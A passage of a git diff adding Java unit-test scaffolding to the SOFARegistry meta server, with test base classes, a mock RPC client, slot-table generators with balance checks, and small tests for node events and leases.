com.alipay.sofa.registry.common.model.slot.Slot; +import com.alipay.sofa.registry.common.model.slot.SlotConfig; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.common.model.store.DataInfo; +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.exception.SofaRegistryRuntimeException; +import com.alipay.sofa.registry.remoting.CallbackHandler; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.remoting.Client; +import com.alipay.sofa.registry.server.meta.bootstrap.config.MetaServerConfig; +import com.alipay.sofa.registry.server.meta.bootstrap.config.NodeConfig; +import com.alipay.sofa.registry.server.meta.provide.data.ProvideDataService; +import com.alipay.sofa.registry.server.meta.slot.balance.BalancePolicy; +import com.alipay.sofa.registry.server.meta.slot.balance.NaiveBalancePolicy; +import com.alipay.sofa.registry.store.api.DBResponse; +import com.alipay.sofa.registry.store.api.OperationStatus; +import com.alipay.sofa.registry.util.DatumVersionUtil; +import com.alipay.sofa.registry.util.JsonUtils; +import com.alipay.sofa.registry.util.MathUtils; +import com.alipay.sofa.registry.util.ObjectFactory; +import com.google.common.collect.Maps; +import java.io.IOException; +import java.lang.reflect.Field; +import java.lang.reflect.Modifier; +import java.net.InetSocketAddress; +import java.net.ServerSocket; +import java.util.Comparator; +import java.util.HashMap; +import java.util.List; +import java.util.Map; +import java.util.Random; +import java.util.Set; +import java.util.concurrent.ConcurrentHashMap; +import java.util.concurrent.ScheduledExecutorService; +import java.util.concurrent.TimeUnit; +import java.util.concurrent.TimeoutException; +import java.util.concurrent.atomic.AtomicInteger; +import java.util.function.BooleanSupplier; +import org.assertj.core.util.Lists; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Rule; +import org.junit.rules.TestName; + +/** + * @author chen.zhu + *

Nov 18, 2020 + */ +public class AbstractMetaServerTestBase extends AbstractTestBase { + + protected MetaLeaderService metaLeaderService; + + protected MetaServerConfig metaServerConfig; + + protected NodeConfig nodeConfig; + + @Rule public TestName name = new TestName(); + + private BalancePolicy balancePolicy = new NaiveBalancePolicy(); + + protected PersistenceData mockPersistenceData() { + String dataInfoId = + DataInfo.toDataInfoId("dataId" + System.currentTimeMillis(), "DEFAULT", "DEFAULT"); + return PersistenceDataBuilder.createPersistenceData( + dataInfoId, "val" + System.currentTimeMillis()); + } + + @Before + public void beforeAbstractMetaServerTest() { + metaLeaderService = mock(MetaLeaderService.class); + nodeConfig = mock(NodeConfig.class); + metaServerConfig = mock(MetaServerConfig.class); + when(nodeConfig.getLocalDataCenter()).thenReturn(getDc()); + } + + public static void setFinalStatic(Field field, Object newValue) throws Exception { + field.setAccessible(true); + + Field modifiersField = Field.class.getDeclaredField("modifiers"); + modifiersField.setAccessible(true); + modifiersField.setInt(field, field.getModifiers() & ~Modifier.FINAL); + + field.set(null, newValue); + } + + protected static void waitConditionUntilTimeOut( + BooleanSupplier booleanSupplier, int waitTimeMilli) + throws TimeoutException, InterruptedException { + + waitConditionUntilTimeOut(booleanSupplier, waitTimeMilli, 2); + } + + protected static void waitConditionUntilTimeOut( + BooleanSupplier booleanSupplier, int waitTimeMilli, int intervalMilli) + throws TimeoutException, InterruptedException { + + long maxTime = System.currentTimeMillis() + waitTimeMilli; + + while (true) { + boolean result = booleanSupplier.getAsBoolean(); + if (result) { + return; + } + if (System.currentTimeMillis() >= maxTime) { + throw new TimeoutException("timeout still false:" + waitTimeMilli); + } + Thread.sleep(intervalMilli); + } + } + + public static URL randomURL() { + return randomURL("127.0.0.1"); + } + + public static URL randomURL(String ip) { + return new URL(ip, randomPort()); + } + + public static int randomPort() { + return randomPort(10000, 20000, null); + } + + public static int randomPort(int min, int max, Set different) { + + Random random = new Random(); + + for (int i = min; i <= max; i++) { + int port = min + random.nextInt(max - min + 1); + if ((different == null || !different.contains(port)) && isUsable(port)) { + return port; + } + } + + throw new IllegalStateException(String.format("random port not found:(%d, %d)", min, max)); + } + + public static int netmask = (1 << 8) - 1; + + public static String randomIp() { + return String.format( + "%d.%d.%d.%d", + (Math.abs(random.nextInt()) % netmask + 1), + (Math.abs(random.nextInt()) % netmask + 1), + (Math.abs(random.nextInt()) % netmask + 1), + (Math.abs(random.nextInt()) % netmask + 1)); + } + + protected static boolean isUsable(int port) { + + try (ServerSocket s = new ServerSocket()) { + s.bind(new InetSocketAddress(port)); + return true; + } catch (IOException e) { + } + return false; + } + + public static String getDc() { + return "DEFAULT_DC"; + } + + public static String randomString() { + + return randomString(1 << 10); + } + + public static String randomString(int length) { + + StringBuilder sb = new StringBuilder(); + for (int i = 0; i < length; i++) { + sb.append((char) ('a' + (int) (26 * Math.random()))); + } + + return sb.toString(); + } + + public static Client getRpcClient( + ScheduledExecutorService scheduled, int responseDelayMilli, Object responseObj) { + return new MockRpcClient() + .setScheduled(scheduled) + .setResponseDelayMilli(responseDelayMilli) + .setResponseObj(responseObj); + } + + public static Client getRpcClient( + ScheduledExecutorService scheduled, int responseDelayMilli, Throwable th) { + return new MockRpcClient() + .setScheduled(scheduled) + .setResponseDelayMilli(responseDelayMilli) + .setPositive(false) + .setThrowable(th); + } + + public static Client getRpcClient(Object response, int responseDelayMilli) { + return new MockRpcClient().setResponseObj(response).setResponseDelayMilli(responseDelayMilli); + } + + public void makeMetaLeader() throws TimeoutException, InterruptedException { + when(metaLeaderService.amILeader()).thenReturn(true); + when(metaLeaderService.amIStableAsLeader()).thenReturn(true); + } + + public void makeMetaNonLeader() throws TimeoutException, InterruptedException { + when(metaLeaderService.amILeader()).thenReturn(false); + } + + public void printSlotTable(SlotTable slotTable) { + try { + logger.warn( + "{}", + JsonUtils.getJacksonObjectMapper() + .writerWithDefaultPrettyPrinter() + .writeValueAsString(slotTable)); + } catch (Exception ignore) { + } + } + + protected boolean isSlotTableBalanced(SlotTable slotTable, List dataNodes) { + Map leaderCounter = Maps.newHashMap(); + for (Slot slot : slotTable.getSlots()) { + counterIncr(leaderCounter, slot.getLeader()); + } + Map followerCounter = Maps.newHashMap(); + for (Slot slot : slotTable.getSlots()) { + for (String follower : slot.getFollowers()) { + counterIncr(followerCounter, follower); + } + } + AtomicInteger leaderTotal = new AtomicInteger(); + leaderCounter.values().forEach(count -> leaderTotal.addAndGet(count)); + int leaderAverage = MathUtils.divideCeil(leaderTotal.get(), dataNodes.size()); + int leaderHighWaterMark = balancePolicy.getHighWaterMarkSlotLeaderNums(leaderAverage); + + AtomicInteger followerTotal = new AtomicInteger(); + followerCounter.values().forEach(count -> followerTotal.addAndGet(count)); + int followerAverage = MathUtils.divideCeil(followerTotal.get(), dataNodes.size()); + int followerHighWaterMark = balancePolicy.getHighWaterMarkSlotFollowerNums(followerAverage); + + logger.info("[isSlotTableBalanced][leaderCounter] {}", leaderCounter); + logger.info("[isSlotTableBalanced][followerCounter] {}", followerCounter); + for (DataNode dataNode : dataNodes) { + if (leaderCounter.get(dataNode.getIp()) == null) { + return false; + } + if (leaderCounter.get(dataNode.getIp()) > leaderHighWaterMark) { + logger.info( + "[highLeader] {}, {}, {}", + dataNode.getIp(), + leaderCounter.get(dataNode.getIp()), + leaderHighWaterMark); + return false; + } + + if (followerCounter.get(dataNode.getIp()) > followerHighWaterMark) { + logger.info( + "[highFollower] {}, {}, {}", + dataNode.getIp(), + followerCounter.get(dataNode.getIp()), + followerHighWaterMark); + return false; + } + } + return true; + } + + protected void assertSlotTableNoDupLeaderFollower(SlotTable slotTable) { + slotTable + .getSlotMap() + .forEach( + (slotId, slot) -> { + Assert.assertFalse(slot.getFollowers().contains(slot.getLeader())); + }); + } + + private void counterIncr(Map counter, String ip) { + Integer prev = counter.get(ip); + counter.put(ip, prev == null ? 1 : prev + 1); + } + + protected boolean isSlotTableLeaderBalanced(SlotTable slotTable, List dataNodes) { + Map counter = Maps.newHashMap(); + for (Slot slot : slotTable.getSlots()) { + counterIncr(counter, slot.getLeader()); + } + + int average = slotTable.getSlotMap().size() / dataNodes.size(); + int lowWaterMark = balancePolicy.getLowWaterMarkSlotLeaderNums(average); + + logger.info("[isSlotTableLeaderBalanced][counter] {}", counter); + for (DataNode dataNode : dataNodes) { + if (counter.get(dataNode.getIp()) == null) { + return false; + } + if (counter.get(dataNode.getIp()) < lowWaterMark) { + return false; + } + // if (counter.get(dataNode.getIp()) > highWaterMark) { + // return false; + // } + } + return true; + } + + public static class MockRpcClient implements Client { + + private ObjectFactory response; + + private int responseDelayMilli; + + private ScheduledExecutorService scheduled; + + private Channel channel; + + private boolean isPositive = true; + + private Throwable throwable; + + @Override + public Channel getChannel(URL url) { + return null; + } + + @Override + public Channel connect(URL url) { + return null; + } + + @Override + public Object sendSync(URL url, Object message, int timeoutMillis) { + try { + Thread.sleep(responseDelayMilli); + throwIfNegative(); + } catch (Throwable e) { + throw new SofaRegistryRuntimeException(e); + } + return response.create(); + } + + @Override + public Object sendSync(Channel channel, Object message, int timeoutMillis) { + try { + Thread.sleep(responseDelayMilli); + throwIfNegative(); + } catch (Throwable e) { + throw new SofaRegistryRuntimeException(e); + } + return response.create(); + } + + @Override + public void sendCallback( + URL url, Object message, CallbackHandler callbackHandler, int timeoutMillis) { + if (isPositive) { + scheduled.schedule( + () -> callbackHandler.onCallback(channel, response.create()), + responseDelayMilli, + TimeUnit.MILLISECONDS); + } else { + scheduled.schedule( + () -> callbackHandler.onException(channel, throwable), + responseDelayMilli, + TimeUnit.MILLISECONDS); + } + } + + @Override + public InetSocketAddress getLocalAddress() { + return null; + } + + @Override + public void close() {} + + @Override + public boolean isClosed() { + return false; + } + + private void throwIfNegative() throws Throwable { + if (!isPositive) { + if (throwable != null) { + throw throwable; + } else { + throw new SofaRegistryRuntimeException("expected exception"); + } + } + } + + public MockRpcClient setResponse(ObjectFactory response) { + this.response = response; + return this; + } + + public MockRpcClient setResponseObj(Object responseObj) { + this.response = + new ObjectFactory() { + @Override + public Object create() { + return responseObj; + } + }; + return this; + } + + public MockRpcClient setResponseDelayMilli(int responseDelayMilli) { + this.responseDelayMilli = responseDelayMilli; + return this; + } + + public MockRpcClient setScheduled(ScheduledExecutorService scheduled) { + this.scheduled = scheduled; + return this; + } + + public MockRpcClient setChannel(Channel channel) { + this.channel = channel; + return this; + } + + public MockRpcClient setPositive(boolean positive) { + isPositive = positive; + return this; + } + + public MockRpcClient setThrowable(Throwable throwable) { + this.throwable = throwable; + return this; + } + } + + protected static List randomDataNodes(int num) { + List result = Lists.newArrayList(); + for (int i = 0; i < num; i++) { + result.add(new DataNode(randomURL(randomIp()), getDc())); + } + return result; + } + + public static SlotTable randomSlotTable() { + return new SlotTableGenerator(randomDataNodes(3)).createSlotTable(); + } + + public static SlotTable randomSlotTable(List dataNodes) { + return randomSlotTable(dataNodes, SlotConfig.SLOT_NUM, SlotConfig.SLOT_REPLICAS); + } + + public static SlotTable randomSlotTable(List dataNodes, int slotNum, int slotReplicas) { + return new SlotTableGenerator(dataNodes).createSlotTable(slotNum, slotReplicas); + } + + protected SlotTable randomUnBalancedSlotTable(List dataNodes) { + return new SlotTableGenerator(dataNodes).createLeaderUnBalancedSlotTable(); + } + + protected boolean isMoreBalanced(SlotTable before, SlotTable current, List dataNodes) { + // Map beforeLeaderCount = + // SlotTableUtils.getSlotTableLeaderCount(before); + // Map currentLeaderCount = + // SlotTableUtils.getSlotTableLeaderCount(current); + // + // Map beforeSlotsCount = SlotTableUtils.getSlotTableSlotCount(before); + // Map currentSlotsCount = + // SlotTableUtils.getSlotTableSlotCount(current); + + int maxLeaderGapBefore = maxLeaderGap(before, dataNodes); + int maxLeaderGapCurrent = maxLeaderGap(current, dataNodes); + int maxSlotsGapBefore = maxSlotGap(before, dataNodes); + int maxSlotsGapCurrent = maxSlotGap(current, dataNodes); + logger.info("[before leader gap] {}", maxLeaderGapBefore); + logger.info("[current leader gap] {}", maxLeaderGapCurrent); + logger.info("[before slots gap] {}", maxSlotsGapBefore); + logger.info("[current slots gap] {}", maxSlotsGapCurrent); + return maxLeaderGapBefore > maxLeaderGapCurrent || maxSlotsGapBefore > maxSlotsGapCurrent; + } + + public static int maxLeaderGap(SlotTable slotTable, List dataNodes) { + Map counter = new HashMap<>(dataNodes.size()); + dataNodes.forEach(dataNode -> counter.put(dataNode.getIp(), 0)); + for (Map.Entry entry : slotTable.getSlotMap().entrySet()) { + int count = counter.get(entry.getValue().getLeader()); + counter.put(entry.getValue().getLeader(), count + 1); + } + return maxGap(counter); + } + + public static int maxSlotGap(SlotTable slotTable, List dataNodes) { + Map counter = new HashMap<>(dataNodes.size()); + dataNodes.forEach(dataNode -> counter.put(dataNode.getIp(), 0)); + for (Map.Entry entry : slotTable.getSlotMap().entrySet()) { + int count = counter.get(entry.getValue().getLeader()); + counter.put(entry.getValue().getLeader(), count + 1); + for (String dataServer : entry.getValue().getFollowers()) { + count = counter.get(dataServer); + counter.put(dataServer, count + 1); + } + } + return maxGap(counter); + } + + public static int maxGap(Map stats) { + int min = Integer.MAX_VALUE, max = Integer.MIN_VALUE; + for (int count : stats.values()) { + min = Math.min(count, min); + max = Math.max(count, max); + } + return max - min; + } + + public static class SlotTableGenerator { + + private final List dataNodes; + + public SlotTableGenerator(List dataNodes) { + this.dataNodes = dataNodes; + } + + public SlotTable createSlotTable(int slotNum, int slotReplicas) { + long epoch = DatumVersionUtil.nextId(); + Map slotMap = generateSlotMap(slotNum, slotReplicas); + return new SlotTable(epoch, slotMap.values()); + } + + public SlotTable createSlotTable() { + return createSlotTable(SlotConfig.SLOT_NUM, SlotConfig.SLOT_REPLICAS); + } + + public SlotTable createLeaderUnBalancedSlotTable() { + long epoch = DatumVersionUtil.nextId(); + Map slotMap = generateUnBalancedSlotMap(); + return new SlotTable(epoch, slotMap.values()); + } + + private Map generateSlotMap(int slotNum, int slotReplicas) { + Map slotMap = Maps.newHashMap(); + for (int i = 0; i < slotNum; i++) { + long epoch = DatumVersionUtil.nextId(); + String leader = getNextLeader().getIp(); + List followers = Lists.newArrayList(); + for (int j = 0; j < slotReplicas - 1; j++) { + followers.add(getNextFollower().getIp()); + } + Slot slot = new Slot(i, leader, epoch, followers); + slotMap.put(i, slot); + } + return slotMap; + } + + private Map generateUnBalancedSlotMap() { + Map slotMap = Maps.newHashMap(); + int leaderIndex = Math.abs(random.nextInt()) % dataNodes.size(); + String leader = dataNodes.get(leaderIndex).getIp(); + for (int i = 0; i < SlotConfig.SLOT_NUM; i++) { + long epoch = DatumVersionUtil.nextId(); + List followers = Lists.newArrayList(); + for (int j = 0; j < SlotConfig.SLOT_REPLICAS - 1; j++) { + DataNode follower = getNextFollower(); + while (follower.getIp().equalsIgnoreCase(leader) || followers.contains(follower)) { + follower = getNextUnbalancedFollower(); + } + followers.add(follower.getIp()); + } + Slot slot = new Slot(i, leader, epoch, followers); + slotMap.put(i, slot); + } + return slotMap; + } + + private AtomicInteger nextLeader = new AtomicInteger(); + + private AtomicInteger nextFollower = new AtomicInteger(1); + + private DataNode getNextLeader() { + return dataNodes.get(nextLeader.getAndIncrement() % dataNodes.size()); + } + + private DataNode getNextFollower() { + return dataNodes.get(nextFollower.getAndIncrement() % dataNodes.size()); + } + + private DataNode getNextUnbalancedFollower() { + return dataNodes.get(nextFollower.getAndIncrement() % dataNodes.size()); + } + + public SlotTableGenerator setNextLeader(int nextLeader) { + this.nextLeader.set(nextLeader); + return this; + } + + public SlotTableGenerator setNextFollower(int nextFollower) { + this.nextFollower.set(nextFollower); + return this; + } + } + + public static class NodeComparator implements Comparator { + + @Override + public int compare(Node o1, Node o2) { + return o1.getNodeUrl().getIpAddress().compareTo(o2.getNodeUrl().getIpAddress()); + } + } + + public static class InMemoryProvideDataRepo implements ProvideDataService { + + private Map localRepo = new ConcurrentHashMap<>(); + + @Override + public boolean saveProvideData(PersistenceData data) { + localRepo.put(PersistenceDataBuilder.getDataInfoId(data), data); + return true; + } + + @Override + public boolean saveProvideData(PersistenceData data, long expectVersion) { + + PersistenceData exist = localRepo.get(PersistenceDataBuilder.getDataInfoId(data)); + if (exist == null) { + localRepo.put(PersistenceDataBuilder.getDataInfoId(data), data); + return true; + } else if (exist.getVersion() == expectVersion) { + localRepo.put(PersistenceDataBuilder.getDataInfoId(data), data); + return true; + } + return false; + } + + @Override + public DBResponse queryProvideData(String key) { + PersistenceData value = localRepo.get(key); + if (value != null) { + return new DBResponse(value, OperationStatus.SUCCESS); + } else { + return new DBResponse(null, OperationStatus.NOTFOUND); + } + } + + @Override + public boolean removeProvideData(String key) { + PersistenceData remove = localRepo.remove(key); + return remove != null; + } + + @Override + public void becomeLeader() {} + + @Override + public void loseLeader() {} + } + + public static class SimpleNode implements Node { + + private String ip; + + public SimpleNode(String ip) { + this.ip = ip; + } + + @Override + public NodeType getNodeType() { + return NodeType.DATA; + } + + @Override + public URL getNodeUrl() { + return new URL(ip); + } + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/AbstractTestBase.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/AbstractTestBase.java new file mode 100644 index 000000000..ad3e47b6c --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/AbstractTestBase.java @@ -0,0 +1,295 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta; + +import com.alipay.sofa.registry.common.model.slot.SlotConfig; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.observer.Observable; +import com.alipay.sofa.registry.observer.UnblockingObserver; +import com.alipay.sofa.registry.util.NamedThreadFactory; +import io.netty.util.ResourceLeakDetector; +import java.io.IOException; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationTargetException; +import java.lang.reflect.Modifier; +import java.net.InetSocketAddress; +import java.net.ServerSocket; +import java.util.Collections; +import java.util.Map; +import java.util.Random; +import java.util.Set; +import java.util.concurrent.CountDownLatch; +import java.util.concurrent.CyclicBarrier; +import java.util.concurrent.Executor; +import java.util.concurrent.ExecutorService; +import java.util.concurrent.Executors; +import java.util.concurrent.ScheduledExecutorService; +import java.util.concurrent.TimeoutException; +import java.util.concurrent.atomic.AtomicInteger; +import java.util.function.BooleanSupplier; +import org.junit.After; +import org.junit.Before; +import org.junit.BeforeClass; +import org.junit.Rule; +import org.junit.rules.TestName; + +/** + * @author chen.zhu + *

Mar 15, 2021 + */ +public class AbstractTestBase { + + protected final Logger logger = LoggerFactory.getLogger(getClass()); + + protected ExecutorService executors; + + protected ScheduledExecutorService scheduled; + + @Rule public TestName name = new TestName(); + + public static final Random random = new Random(); + + @BeforeClass + public static void beforeAbstractTestClass() { + System.setProperty("spring.main.show_banner", "false"); + System.setProperty("spring.profiles.active", "test"); + System.setProperty(SlotConfig.KEY_DATA_SLOT_NUM, "16"); + } + + @Before + public void beforeAbstractTest() throws Exception { + + ResourceLeakDetector.setLevel(ResourceLeakDetector.Level.PARANOID); + Thread.interrupted(); // clear interrupt + + executors = Executors.newCachedThreadPool(new NamedThreadFactory(name.getMethodName())); + scheduled = + Executors.newScheduledThreadPool( + Runtime.getRuntime().availableProcessors(), + new NamedThreadFactory("sched-" + name.getMethodName())); + if (logger.isInfoEnabled()) { + logger.info(remarkableMessage("[begin test][{}]"), name.getMethodName()); + } + } + + @After + public void afterAbstractTest() + throws IOException, NoSuchMethodException, InvocationTargetException, IllegalAccessException { + executors.shutdownNow(); + scheduled.shutdownNow(); + + logger.info(remarkableMessage("[end test][{}]"), name.getMethodName()); + } + + protected static void setEnv(Map newenv) throws Exception { + try { + Class processEnvironmentClass = Class.forName("java.lang.ProcessEnvironment"); + Field theEnvironmentField = processEnvironmentClass.getDeclaredField("theEnvironment"); + theEnvironmentField.setAccessible(true); + Map env = (Map) theEnvironmentField.get(null); + env.putAll(newenv); + Field theCaseInsensitiveEnvironmentField = + processEnvironmentClass.getDeclaredField("theCaseInsensitiveEnvironment"); + theCaseInsensitiveEnvironmentField.setAccessible(true); + Map cienv = + (Map) theCaseInsensitiveEnvironmentField.get(null); + cienv.putAll(newenv); + } catch (NoSuchFieldException e) { + Class[] classes = Collections.class.getDeclaredClasses(); + Map env = System.getenv(); + for (Class cl : classes) { + if ("java.util.Collections$UnmodifiableMap".equals(cl.getName())) { + Field field = cl.getDeclaredField("m"); + field.setAccessible(true); + Object obj = field.get(env); + Map map = (Map) obj; + map.clear(); + map.putAll(newenv); + } + } + } + } + + public static void setFinalStatic(Field field, Object newValue) throws Exception { + field.setAccessible(true); + + Field modifiersField = Field.class.getDeclaredField("modifiers"); + modifiersField.setAccessible(true); + modifiersField.setInt(field, field.getModifiers() & ~Modifier.FINAL); + + field.set(null, newValue); + } + + protected String remarkableMessage(String msg) { + return String.format("--------------------------%s--------------------------\r\n", msg); + } + + protected void waitForAnyKeyToExit() throws IOException { + logger.info("type any key to exit.................."); + waitForAnyKey(); + } + + protected void waitForAnyKey() throws IOException { + System.in.read(); + } + + protected void waitConditionUntilTimeOut(BooleanSupplier booleanSupplier) + throws TimeoutException, InterruptedException { + + waitConditionUntilTimeOut(booleanSupplier, 5000, 2); + } + + protected static void waitConditionUntilTimeOut( + BooleanSupplier booleanSupplier, int waitTimeMilli) + throws TimeoutException, InterruptedException { + + waitConditionUntilTimeOut(booleanSupplier, waitTimeMilli, 2); + } + + protected static void waitConditionUntilTimeOut( + BooleanSupplier booleanSupplier, int waitTimeMilli, int intervalMilli) + throws TimeoutException, InterruptedException { + + long maxTime = System.currentTimeMillis() + waitTimeMilli; + + while (true) { + boolean result = booleanSupplier.getAsBoolean(); + if (result) { + return; + } + if (System.currentTimeMillis() >= maxTime) { + throw new TimeoutException("timeout still false:" + waitTimeMilli); + } + Thread.sleep(intervalMilli); + } + } + + public static int randomPort() { + return randomPort(10000, 20000, null); + } + + public static int randomPort(int min, int max, Set different) { + + Random random = new Random(); + + for (int i = min; i <= max; i++) { + int port = min + random.nextInt(max - min + 1); + if ((different == null || !different.contains(port)) && isUsable(port)) { + return port; + } + } + + throw new IllegalStateException(String.format("random port not found:(%d, %d)", min, max)); + } + + public static int netmask = (1 << 8) - 1; + + public static String randomIp() { + return String.format( + "%d.%d.%d.%d", + (Math.abs(random.nextInt()) % netmask + 1), + (Math.abs(random.nextInt()) % netmask + 1), + (Math.abs(random.nextInt()) % netmask + 1), + (Math.abs(random.nextInt()) % netmask + 1)); + } + + protected static boolean isUsable(int port) { + + try (ServerSocket s = new ServerSocket()) { + s.bind(new InetSocketAddress(port)); + return true; + } catch (IOException e) { + } + return false; + } + + public static String getDc() { + return "DEFAULT_DC"; + } + + public static String randomString() { + + return randomString(1 << 10); + } + + public static String randomString(int length) { + + StringBuilder sb = new StringBuilder(); + for (int i = 0; i < length; i++) { + sb.append((char) ('a' + (int) (26 * Math.random()))); + } + + return sb.toString(); + } + + public static class NotifyObserversCounter implements UnblockingObserver { + + private final AtomicInteger counter = new AtomicInteger(0); + + @Override + public void update(Observable source, Object message) { + counter.getAndIncrement(); + } + + public int getCounter() { + return counter.get(); + } + } + + public static class ConcurrentExecutor implements Executor { + + private final int tasks; + + private final CyclicBarrier barrier; + + private final CountDownLatch latch; + + private final ExecutorService executors; + + public ConcurrentExecutor(int tasks, ExecutorService executors) { + this.tasks = tasks; + this.barrier = new CyclicBarrier(tasks); + this.latch = new CountDownLatch(tasks); + this.executors = executors; + } + + @Override + public void execute(final Runnable command) { + for (int i = 0; i < tasks; i++) { + executors.execute( + new Runnable() { + @Override + public void run() { + try { + barrier.await(); + command.run(); + } catch (Exception ignore) { + } + + latch.countDown(); + } + }); + } + try { + latch.await(); + } catch (InterruptedException e) { + throw new RuntimeException(e); + } + } + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/cluster/node/NodeModifiedTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/cluster/node/NodeModifiedTest.java new file mode 100644 index 000000000..58eb4a133 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/cluster/node/NodeModifiedTest.java @@ -0,0 +1,38 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.cluster.node; + +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import org.junit.Assert; +import org.junit.Test; + +/** + * @author zhuchen + * @date Dec 15, 2020, 8:02:29 PM + *

nothing here, simply increase unit test coverage + */ +public class NodeModifiedTest extends AbstractMetaServerTestBase { + + @Test + public void testGetOldNode() { + NodeModified event = + new NodeModified<>(new SimpleNode(randomIp()), new SimpleNode(randomIp())); + Assert.assertNotNull(event.getNewNode()); + Assert.assertNotNull(event.getOldNode()); + Assert.assertNotEquals(event.getOldNode(), event.getNewNode()); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/cluster/node/TestAbstractNodeEventTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/cluster/node/TestAbstractNodeEventTest.java new file mode 100644 index 000000000..10a9d5250 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/cluster/node/TestAbstractNodeEventTest.java @@ -0,0 +1,35 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.cluster.node; + +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import org.junit.Assert; +import org.junit.Test; + +public class TestAbstractNodeEventTest { + + private Logger logger = LoggerFactory.getLogger(TestAbstractNodeEventTest.class); + + @Test + public void testGetNode() { + NodeModifiedTest.SimpleNode simpleNode = new NodeModifiedTest.SimpleNode("127.0.0.1"); + AbstractNodeEvent event = new AbstractNodeEvent(simpleNode) {}; + Assert.assertEquals(simpleNode, event.getNode()); + logger.info("[testGetNode] {}", event); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/lease/LeaseTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/lease/LeaseTest.java new file mode 100644 index 000000000..466122426 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/lease/LeaseTest.java @@ -0,0 +1,85 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.lease; + +import com.alipay.sofa.registry.common.model.metaserver.Lease; +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import java.util.concurrent.TimeUnit; +import org.junit.Assert; +import org.junit.Test; + +public class LeaseTest extends AbstractMetaServerTestBase { + + private Lease lease; + + @Test + public void testIsExpired() throws InterruptedException { + lease = new Lease<>(new Object(), 1, TimeUnit.MILLISECONDS); + Thread.sleep(2); + Assert.assertTrue(lease.isExpired()); + lease.renew(1); + Assert.assertFalse(lease.isExpired()); + } + + @Test + public void testGetBeginTimestamp() throws InterruptedException { + lease = new Lease<>(new Object(), 1); + long begin = lease.getBeginTimestamp(); + lease.renew(); + Thread.sleep(5); + lease.renew(); + Assert.assertEquals(begin, lease.getBeginTimestamp()); + } + + @Test + public void testGetLastUpdateTimestamp() throws InterruptedException { + lease = new Lease<>(new Object(), 1); + long firstUpdate = lease.getLastUpdateTimestamp(); + lease.renew(); + Thread.sleep(5); + lease.renew(); + Assert.assertNotEquals(firstUpdate, lease.getLastUpdateTimestamp()); + } + + @Test + public void testSetRenewal() { + Object first = new Object(); + lease = new Lease<>(first, 1); + lease.renew(); + Object second = new Object(); + lease.setRenewal(second); + Assert.assertNotEquals(first, lease.getRenewal()); + } + + @Test + public void testEquals() throws InterruptedException { + DataNode sample = new DataNode(randomURL(randomIp()), getDc()); + Lease lease1 = new Lease<>(new Object(), 1, TimeUnit.MILLISECONDS); + Lease lease2 = new Lease<>(sample, 1, TimeUnit.MILLISECONDS); + Thread.sleep(5); + Lease lease3 = + new 